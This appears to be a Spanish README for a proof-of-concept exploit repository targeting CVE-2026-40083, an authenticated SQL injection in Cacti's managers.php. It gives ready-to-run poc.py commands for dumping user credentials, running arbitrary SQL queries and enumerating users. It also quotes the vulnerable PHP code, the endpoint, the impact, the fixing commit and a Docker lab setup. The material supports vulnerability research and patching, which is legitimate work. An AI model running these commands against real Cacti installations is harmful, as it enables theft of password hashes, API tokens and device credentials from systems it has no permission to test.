
Inyección SQL en Cacti
Un exploit de prueba de concepto para CVE-2026-40083, una vulnerabilidad de inyección SQL en managers.php de Cacti que permite a cualquier usuario autenticado con permisos de Administrador SNMP leer toda la base de datos MySQL, incluyendo credenciales de usuario y hashes de contraseñas.
Uso:
# Verify injection (time-based)
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin
# Dump specific user credentials
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --target-id 1
# Extract arbitrary SQL query result
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --query "SELECT version()"
# Enumerate all users (scan IDs 1-50)
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --max-id 50
# With Burp proxy
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --proxy http://127.0.0.1:8080
En managers.php, la entrada del usuario proveniente de selected_graphs_array se deserializa mediante cacti_unserialize() y se inserta directamente en SQL sin saneamiento:
$selected_items = cacti_unserialize(stripslashes(gnrv('selected_graphs_array')));
if ($selected_items != false) {
// No validation - direct implode into SQL
db_execute('DELETE FROM snmpagent_managers WHERE id IN (' . implode(',', $selected_items) . ')');
}
El parámetro selected_graphs_array acepta un array serializado de PHP. Los elementos del array se unen con comas y se inyectan directamente en la cláusula IN.
POST /managers.php (action=actions, drp_action=1|2|3)
La vulnerabilidad de inyección SQL permite a usuarios autenticados con permisos de Administrador SNMP ejecutar consultas arbitrarias en la base de datos. Esto posibilita la lectura de tablas que contienen datos de usuario, configuraciones, credenciales de dispositivos y comunidades SNMP, así como la extracción de hashes bcrypt y tokens de API, lo que puede resultar en el compromiso de cuentas. Además, el fallo permite la ejecución de comandos con demora temporal, pudiendo causar una denegación de servicio al agotar las conexiones simultáneas a la base de datos.
7.2 Alto CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
El commit 52032e760 añade array_map('intval', $selected_items) antes de implode para convertir todos los valores a enteros.
docker-compose up -d --build
Espere ~30 segundos para la inicialización. Acceda a Cacti en http://localhost:8088
Credenciales por defecto: admin / admin
# Test exploit
python3 exploit/poc.py --url http://localhost:8088 --user admin --password admin --target-id 1
Esta herramienta es solo para fines educativos y de investigación. Úsela únicamente en sistemas que posea o para los cuales tenga permiso explícito de prueba. El autor no se responsabiliza por cualquier uso indebido o daño causado por este programa.
QuimeraX Intelligence es una plataforma avanzada de EASM e Inteligencia de Amenazas Cibernéticas especializada en identificar vulnerabilidades críticas en sistemas complejos. La plataforma monitorea, detecta y alerta proactivamente a los clientes sobre amenazas de seguridad, garantizando transparencia y una respuesta rápida a posibles riesgos. Los clientes reciben notificaciones inmediatas e informes completos si sus sistemas se encuentran vulnerables, permitiéndoles tomar medidas de protección. más información
Hakai Security es una empresa de ciberseguridad fundada por profesionales de la seguridad, comprometida con la excelencia técnica. Ofrecemos soluciones de seguridad a medida que incluyen pruebas de penetración avanzadas, simulaciones realistas de Red Team y prácticas de desarrollo seguro para proteger proactivamente los activos de nuestros clientes frente a las amenazas cibernéticas en evolución.
Hacking Club es la plataforma de formación donde aprendes ciberseguridad a través de lecciones prácticas, laboratorios y desafíos creados por expertos que trabajan en nuestra firma de consultoría de seguridad: directamente desde el campo de batalla a tu entrenamiento. ¡Practica la vulnerabilidad presentada en este repositorio con hacking club! más información